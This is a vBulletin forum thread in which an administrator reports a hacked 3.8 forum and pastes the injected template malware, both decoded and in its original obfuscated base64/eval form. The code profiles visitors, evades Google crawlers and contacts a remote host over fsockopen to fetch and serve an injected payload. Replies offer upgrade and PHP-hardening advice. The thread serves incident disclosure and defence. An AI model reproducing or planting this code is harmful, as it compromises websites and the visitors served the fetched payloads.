vB 3.8 Injection ?

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • kau
    Senior Member
    • Jul 2002
    • 772
    #1

    vB 3.8 Injection ?

    Anyone had issues lately?

    I had a pretty locked down vB 3.8 forum get hit tonight. Announcements turned off, .htaccess on AdminCP, only one Admin account. Not that many plugins, no vBSEO.

    They injected it into the headinclude template and here it is:

    Unencoded, unobfuscated code:

    function bIREgRNVk($p) {

    $m = false;

    $file_d = '/tmp/._tmpnIPmYXXd';

    $ip_l = (string)ip2long($p);

    if(file_exists($file_d) and @is_writable($file_d) and (($size_f = @filesize($file_d)) > 0)) {

    $data = file_get_contents($file_d);

    $data .= "$ip_l,";

    if(substr_count($data,"$ip_l,") <= 1) $m = true;

    if($size_f > 1000000) $data = "$ip_l,";

    file_put_contents($file_d,$data);

    return $m;

    } else return true;

    }

    function ddGFJZYNg($i) {

    $k='oVOgAdDKxscvVubUYsxi';

    $h="\x65\x6d\x61\x69\x6c\x6d\x61\x6e\x61\x67\x65\x72\x2e\x63\x63";

    $fp=@fsockopen($h,80,$e,$er,4);

    if(!$fp){

    @fclose($fp);

    return '';

    }else{

    @fputs($fp,"GET /".mt_rand(0,99999999)."?".base64_encode(implode('@@',array($k,$i,$_SERVER['HTTP_USER_AGENT'])))." HTTP/1.1\r\nHost: $h\r\nConnection: Close\r\n\r\n");

    $a='';

    while(!feof($fp)){

    $a.=@fgets($fp,512);

    if(stristr($a,'400 Bad')){

    @fclose($fp);

    return '';

    }elseif(stristr($a,'200 Ok')){

    if(preg_match("/YmYcarAutsgliT(.*?)piXuSiGnCczjgJZ/i",$a,$ret)) {

    @fclose($fp);

    return(base64_decode(trim($ret['1'])));

    }

    }

    }

    @fclose($fp);

    }

    return '';

    }

    function bXvuStv() {

    $ip = '';

    return @getenv('HTTP_X_FORWARDED_FOR');

    }

    function ZgGohvIGL() {

    if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace| alexa|doubleclick|tinyurl|search|blekko|duckduckgo|facebook|info|wow#i',$_SERVER['HTTP_REFERER'])) {

    if(preg_match('#msie|firefox|opera|chrome|trident|edge|safari#i',$_SERVER['HTTP_USER_AGENT'])) return true;

    }

    }

    function OtEASRm($p) {

    $a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','6 6.102.','64.233.');

    foreach($a as $b) {

    if(preg_match("/^$b/i",$p)) return true;

    }

    }

    if(!empty($_SERVER['HTTP_REFERER']) and !empty($_SERVER['HTTP_ACCEPT']) and !empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {

    if(ZgGohvIGL() and ($p =@getenv('REMOTE_ADDR')) and !OtEASRm($p) and bIREgRNVk($p)) {

    return ddGFJZYNg($p);

    }

    }

    return '';











    Original block of code in the template:



    {${$aHAJNcpd="\142"."\x61".chr(115)."\145"."\66".chr(52).chr(95)."\x64".chr(101)."\x63"."\ x6f".chr(100)."\145"}}{${$JAeJayc="\143"."\x72"."\x65".chr(97).chr(116)."\x65"."\137".chr( 102).chr(117)."\156"."\x63"."\x74"."\151".chr(111).chr(110)}}{${$KIuvfJoMt=$JAeJayc(null,$ aHAJNcpd("cmV0dXJuIEBldmFsKGJhc2U2NF9kZWNvZGUoJ1puVnVZM1JwYjI0Z1lrbFNSV2RTVGxacktDUndLU0I3 RFFva2JTQTlJR1poYkhObE93MEtKR1pwYkdWZlpDQTlJQ2N2ZEcxd0x5NWZkRzF3YmtsUWJWbFlXR1FuT3cwS0pHbH dYMndnUFNBb2MzUnlhVzVuS1dsd01teHZibWNvSkhBcE93MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1ZmWkNr Z1lXNWtJRUJwYzE5M2NtbDBZV0pzWlNna1ptbHNaVjlrS1NCaGJtUWdLQ2drYzJsNlpWOW1JRDBnUUdacGJHVnphWH BsS0NSbWFXeGxYMlFwS1NBK0lEQXBLU0I3RFFvZ0pHUmhkR0VnUFNCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lna1pt bHNaVjlrS1RzTkNpQWtaR0YwWVNBdVBTQWlKR2x3WDJ3c0lqc05DaUFnYVdZb2MzVmljM1J5WDJOdmRXNTBLQ1JrWV hSaExDSWthWEJmYkN3aUtTQThQU0F4S1NBa2JTQTlJSFJ5ZFdVN0RRb2dJR2xtS0NSemFYcGxYMllnUGlBeE1EQXdN REF3S1NBa1pHRjBZU0E5SUNJa2FYQmZiQ3dpT3cwS0lDQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5Z2tabWxzWlY5a0 xDUmtZWFJoS1RzTkNpQWdjbVYwZFhKdUlDUnRPdzBLSUgwZ1pXeHpaU0J5WlhSMWNtNGdkSEoxWlRzTkNuME5DbVox Ym1OMGFXOXVJR1JrUjBaS1dsbE9aeWdrYVNrZ2V3MEtKR3M5SjI5V1QyZEJaRVJMZUhOamRsWjFZbFZaYzNocEp6c0 5DaVJvUFNKY2VEWTFYSGcyWkZ4NE5qRmNlRFk1WEhnMlkxeDRObVJjZURZeFhIZzJaVng0TmpGY2VEWTNYSGcyTlZ4 NE56SmNlREpsWEhnMk0xeDROak1pT3cwS0pHWndQVUJtYzI5amEyOXdaVzRvSkdnc09EQXNKR1VzSkdWeUxEUXBPdz BLYVdZb0lTUm1jQ2w3RFFwQVptTnNiM05sS0NSbWNDazdEUXB5WlhSMWNtNGdKeWM3RFFwOVpXeHpaWHNOQ2tCbWNI VjBjeWdrWm5Bc0lrZEZWQ0F2SWk1dGRGOXlZVzVrS0RBc09UazVPVGs1T1RrcExpSS9JaTVpWVhObE5qUmZaVzVqYj JSbEtHbHRjR3h2WkdVb0owQkFKeXhoY25KaGVTZ2theXdrYVN3a1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhS VTVVSjEwcEtTa3VJaUJJVkZSUUx6RXVNVnh5WEc1SWIzTjBPaUFrYUZ4eVhHNURiMjV1WldOMGFXOXVPaUJEYkc5el pWeHlYRzVjY2x4dUlpazdEUW9rWVQwbkp6c05DbmRvYVd4bEtDRm1aVzltS0NSbWNDa3BldzBLSkdFdVBVQm1aMlYw Y3lna1puQXNOVEV5S1RzTkNtbG1LSE4wY21semRISW9KR0VzSnpRd01DQkNZV1FuS1NsN0RRcEFabU5zYjNObEtDUm 1jQ2s3RFFweVpYUjFjbTRnSnljN0RRcDlaV3h6WldsbUtITjBjbWx6ZEhJb0pHRXNKekl3TUNCUGF5Y3BLWHNOQ2lC cFppaHdjbVZuWDIxaGRHTm9LQ0l2V1cxWlkyRnlRWFYwYzJkc2FWUW9MaW8vS1hCcFdIVlRhVWR1UTJONmFtZEtXaT lwSWl3a1lTd2tjbVYwS1NrZ2V3MEtDU0JBWm1Oc2IzTmxLQ1JtY0NrN0RRb0pJSEpsZEhWeWJpaGlZWE5sTmpSZlpH VmpiMlJsS0hSeWFXMG9KSEpsZEZzbk1TZGRLU2twT3cwS0lIME5DbjBOQ24wTkNrQm1ZMnh2YzJVb0pHWndLVHNOQ2 4wTkNuSmxkSFZ5YmlBbkp6c05DbjBOQ21aMWJtTjBhVzl1SUdKWWRuVlRkSFlvS1NCN0RRb2thWEFnUFNBbkp6c05D bkpsZEhWeWJpQkFaMlYwWlc1MktDZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgwWlBVaWNwT3cwS2ZRMEtablZ1WTNScG IyNGdXbWRIYjJoMlNVZE1LQ2tnZXcwS2FXWW9jSEpsWjE5dFlYUmphQ2duSTJkdmIyZHNaWHh0YzI1OGJHbDJaWHho YkhSaGRtbHpkR0Y4WVhOcmZIbGhhRzl2ZkdGdmJIeGlhVzVuZkdWNFlXeGxZV1I4WlhoamFYUmxmR3g1WTI5emZHMT VjM0JoWTJWOFlXeGxlR0Y4Wkc5MVlteGxZMnhwWTJ0OGRHbHVlWFZ5Ykh4elpXRnlZMmg4WW14bGEydHZmR1IxWTJ0 a2RXTnJaMjk4Wm1GalpXSnZiMnQ4YVc1bWIzeDNiM2NqYVNjc0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaW RkS1NrZ2V3MEtJR2xtS0hCeVpXZGZiV0YwWTJnb0p5TnRjMmxsZkdacGNtVm1iM2g4YjNCbGNtRjhZMmh5YjIxbGZI UnlhV1JsYm5SOFpXUm5aWHh6WVdaaGNta2phU2NzSkY5VFJWSldSVkpiSjBoVVZGQmZWVk5GVWw5QlIwVk9WQ2RkS1 NrZ2NtVjBkWEp1SUhSeWRXVTdEUW9nZlEwS2ZRMEtablZ1WTNScGIyNGdUM1JGUVZOU2JTZ2tjQ2tnZXcwS0pHRWdQ U0JoY25KaGVTZ25NakUyTGpJek9TNG5MQ2N5TURrdU9EVXVKeXduTVRjekxqSTFOUzRuTENjeE56TXVNVGswTGljc0 p6ZzVMakl3Tnk0bkxDYzNOQzR4TWpVdUp5d25Oekl1TVRRdUp5d25Oall1TWpRNUxpY3NKelkyTGpFd01pNG5MQ2My TkM0eU16TXVKeWs3RFFwbWIzSmxZV05vS0NSaElHRnpJQ1JpS1NCN0RRb2dhV1lvY0hKbFoxOXRZWFJqYUNnaUwxNG tZaTlwSWl3a2NDa3BJSEpsZEhWeWJpQjBjblZsT3cwS0lIME5DbjBOQ21sbUtDRmxiWEIwZVNna1gxTkZVbFpGVWxz blNGUlVVRjlTUlVaRlVrVlNKMTBwSUdGdVpDQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVKMT BwSUdGdVpDQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVYMHhCVGtkVlFVZEZKMTBwS1NCN0RR b2dhV1lvV21kSGIyaDJTVWRNS0NrZ1lXNWtJQ2drY0NBOVFHZGxkR1Z1ZGlnblVrVk5UMVJGWDBGRVJGSW5LU2tnWV c1a0lDRlBkRVZCVTFKdEtDUndLU0JoYm1RZ1lrbFNSV2RTVGxacktDUndLU2tnZXcwS0lISmxkSFZ5YmlCa1pFZEdT bHBaVG1jb0pIQXBPdzBLSUgwTkNuME5DbkpsZEhWeWJpQW5KenM9JykpOw=="))}}{$KIuvfJoMt()}{${$aHAJNcp d="\142"."\x61".chr(115)."\145"."\66".chr(52).chr(95)."\x64".chr(101)."\x63"."\x6f".chr(10 0)."\145"}}{${$JAeJayc="\143"."\x72"."\x65".chr(97).chr(116)."\x65"."\137".chr(102).chr(11 7)."\156"."\x63"."\x74"."\151".chr(111).chr(110)}}{${$KIuvfJoMt=$JAeJayc(null,$aHAJNcpd("c mV0dXJuIEBldmFsKGJhc2U2NF9kZWNvZGUoJ1puVnVZM1JwYjI0Z1lrbFNSV2RTVGxacktDUndLU0I3RFFva2JTQTl JR1poYkhObE93MEtKR1pwYkdWZlpDQTlJQ2N2ZEcxd0x5NWZkRzF3YmtsUWJWbFlXR1FuT3cwS0pHbHdYMndnUFNBb 2MzUnlhVzVuS1dsd01teHZibWNvSkhBcE93MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1ZmWkNrZ1lXNWtJRUJ wYzE5M2NtbDBZV0pzWlNna1ptbHNaVjlrS1NCaGJtUWdLQ2drYzJsNlpWOW1JRDBnUUdacGJHVnphWHBsS0NSbWFXe GxYMlFwS1NBK0lEQXBLU0I3RFFvZ0pHUmhkR0VnUFNCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lna1ptbHNaVjlrS1R zTkNpQWtaR0YwWVNBdVBTQWlKR2x3WDJ3c0lqc05DaUFnYVdZb2MzVmljM1J5WDJOdmRXNTBLQ1JrWVhSaExDSWthW EJmYkN3aUtTQThQU0F4S1NBa2JTQTlJSFJ5ZFdVN0RRb2dJR2xtS0NSemFYcGxYMllnUGlBeE1EQXdNREF3S1NBa1p HRjBZU0E5SUNJa2FYQmZiQ3dpT3cwS0lDQm1hV3hsWDNCMWRGOWpiMjUwWlc1MGN5Z2tabWxzWlY5a0xDUmtZWFJoS 1RzTkNpQWdjbVYwZFhKdUlDUnRPdzBLSUgwZ1pXeHpaU0J5WlhSMWNtNGdkSEoxWlRzTkNuME5DbVoxYm1OMGFXOXV JR1JrUjBaS1dsbE9aeWdrYVNrZ2V3MEtKR3M5SjI5V1QyZEJaRVJMZUhOamRsWjFZbFZaYzNocEp6c05DaVJvUFNKY 2VEWTFYSGcyWkZ4NE5qRmNlRFk1WEhnMlkxeDRObVJjZURZeFhIZzJaVng0TmpGY2VEWTNYSGcyTlZ4NE56SmNlREp sWEhnMk0xeDROak1pT3cwS0pHWndQVUJtYzI5amEyOXdaVzRvSkdnc09EQXNKR1VzSkdWeUxEUXBPdzBLYVdZb0lTU m1jQ2w3RFFwQVptTnNiM05sS0NSbWNDazdEUXB5WlhSMWNtNGdKeWM3RFFwOVpXeHpaWHNOQ2tCbWNIVjBjeWdrWm5 Bc0lrZEZWQ0F2SWk1dGRGOXlZVzVrS0RBc09UazVPVGs1T1RrcExpSS9JaTVpWVhObE5qUmZaVzVqYjJSbEtHbHRjR 3h2WkdVb0owQkFKeXhoY25KaGVTZ2theXdrYVN3a1gxTkZVbFpGVWxzblNGUlVVRjlWVTBWU1gwRkhSVTVVSjEwcEt Ta3VJaUJJVkZSUUx6RXVNVnh5WEc1SWIzTjBPaUFrYUZ4eVhHNURiMjV1WldOMGFXOXVPaUJEYkc5elpWeHlYRzVjY 2x4dUlpazdEUW9rWVQwbkp6c05DbmRvYVd4bEtDRm1aVzltS0NSbWNDa3BldzBLSkdFdVBVQm1aMlYwY3lna1puQXN OVEV5S1RzTkNtbG1LSE4wY21semRISW9KR0VzSnpRd01DQkNZV1FuS1NsN0RRcEFabU5zYjNObEtDUm1jQ2s3RFFwe VpYUjFjbTRnSnljN0RRcDlaV3h6WldsbUtITjBjbWx6ZEhJb0pHRXNKekl3TUNCUGF5Y3BLWHNOQ2lCcFppaHdjbVZ uWDIxaGRHTm9LQ0l2V1cxWlkyRnlRWFYwYzJkc2FWUW9MaW8vS1hCcFdIVlRhVWR1UTJONmFtZEtXaTlwSWl3a1lTd 2tjbVYwS1NrZ2V3MEtDU0JBWm1Oc2IzTmxLQ1JtY0NrN0RRb0pJSEpsZEhWeWJpaGlZWE5sTmpSZlpHVmpiMlJsS0h SeWFXMG9KSEpsZEZzbk1TZGRLU2twT3cwS0lIME5DbjBOQ24wTkNrQm1ZMnh2YzJVb0pHWndLVHNOQ24wTkNuSmxkS FZ5YmlBbkp6c05DbjBOQ21aMWJtTjBhVzl1SUdKWWRuVlRkSFlvS1NCN0RRb2thWEFnUFNBbkp6c05DbkpsZEhWeWJ pQkFaMlYwWlc1MktDZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgwWlBVaWNwT3cwS2ZRMEtablZ1WTNScGIyNGdXbWRIY jJoMlNVZE1LQ2tnZXcwS2FXWW9jSEpsWjE5dFlYUmphQ2duSTJkdmIyZHNaWHh0YzI1OGJHbDJaWHhoYkhSaGRtbHp kR0Y4WVhOcmZIbGhhRzl2ZkdGdmJIeGlhVzVuZkdWNFlXeGxZV1I4WlhoamFYUmxmR3g1WTI5emZHMTVjM0JoWTJWO FlXeGxlR0Y4Wkc5MVlteGxZMnhwWTJ0OGRHbHVlWFZ5Ykh4elpXRnlZMmg4WW14bGEydHZmR1IxWTJ0a2RXTnJaMjk 4Wm1GalpXSnZiMnQ4YVc1bWIzeDNiM2NqYVNjc0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaWRkS1NrZ2V3M EtJR2xtS0hCeVpXZGZiV0YwWTJnb0p5TnRjMmxsZkdacGNtVm1iM2g4YjNCbGNtRjhZMmh5YjIxbGZIUnlhV1JsYm5 SOFpXUm5aWHh6WVdaaGNta2phU2NzSkY5VFJWSldSVkpiSjBoVVZGQmZWVk5GVWw5QlIwVk9WQ2RkS1NrZ2NtVjBkW Ep1SUhSeWRXVTdEUW9nZlEwS2ZRMEtablZ1WTNScGIyNGdUM1JGUVZOU2JTZ2tjQ2tnZXcwS0pHRWdQU0JoY25KaGV TZ25NakUyTGpJek9TNG5MQ2N5TURrdU9EVXVKeXduTVRjekxqSTFOUzRuTENjeE56TXVNVGswTGljc0p6ZzVMakl3T nk0bkxDYzNOQzR4TWpVdUp5d25Oekl1TVRRdUp5d25Oall1TWpRNUxpY3NKelkyTGpFd01pNG5MQ2MyTkM0eU16TXV KeWs3RFFwbWIzSmxZV05vS0NSaElHRnpJQ1JpS1NCN0RRb2dhV1lvY0hKbFoxOXRZWFJqYUNnaUwxNGtZaTlwSWl3a 2NDa3BJSEpsZEhWeWJpQjBjblZsT3cwS0lIME5DbjBOQ21sbUtDRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRjl TUlVaRlVrVlNKMTBwSUdGdVpDQWhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVKMTBwSUdGdVpDQ WhaVzF3ZEhrb0pGOVRSVkpXUlZKYkowaFVWRkJmUVVORFJWQlVYMHhCVGtkVlFVZEZKMTBwS1NCN0RRb2dhV1lvV21 kSGIyaDJTVWRNS0NrZ1lXNWtJQ2drY0NBOVFHZGxkR1Z1ZGlnblVrVk5UMVJGWDBGRVJGSW5LU2tnWVc1a0lDRlBkR VZCVTFKdEtDUndLU0JoYm1RZ1lrbFNSV2RTVGxacktDUndLU2tnZXcwS0lISmxkSFZ5YmlCa1pFZEdTbHBaVG1jb0p IQXBPdzBLSUgwTkNuME5DbkpsZEhWeWJpQW5KenM9JykpOw=="))}}{$KIuvfJoMt()
    Group Builder
    Tags: None
    • Mark.B
      vBulletin Support
      • Feb 2004
      • 24287
      • 6.0.X
      #2
      No known security issues on vB3. What version of the software are you running? Anything less than 3.8.9 is considered insecure.
      MARK.B
      vBulletin Support
      ------------
      My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
      My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

        Comment

        • Paul M
          Former Lead Developer
          vB.Com & vB.Org
          • Sep 2004
          • 9886
          #3
          Anything less than 3.8.9 is considered insecure.
          3.8.8 & 3.8.7 are currently patched with any reported issues.
          Baby, I was born this way

            Comment

            • Set3sh
              Senior Member
              • Jan 2013
              • 243
              • 5.2.x
              #4
              Hello,

              Firstly upgrade your PHP version (I think you are using an EOL version which is practically an invitation to trouble) to the latest supported one.

              Secondly disable the "fopen" function.

              Thirdly create a separate folder for each one of your websites in order to be used as a temporary environment (rather than using the /tmp partition), make sure that folder can only be accessed by the user of a certain website of yours.

              Another best practice is to make use of the built-in chroot functionality within PHP to limit the folder access rights of any script.

              You can also take this further by sanitizing any input etc.

              The above stated are just a few best security practices in order to prevent, minimize the damage and contain any malicious script due to a flaw in a PHP based application.

              Kind regards,
              George.

                Comment

                Previous template Next
                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...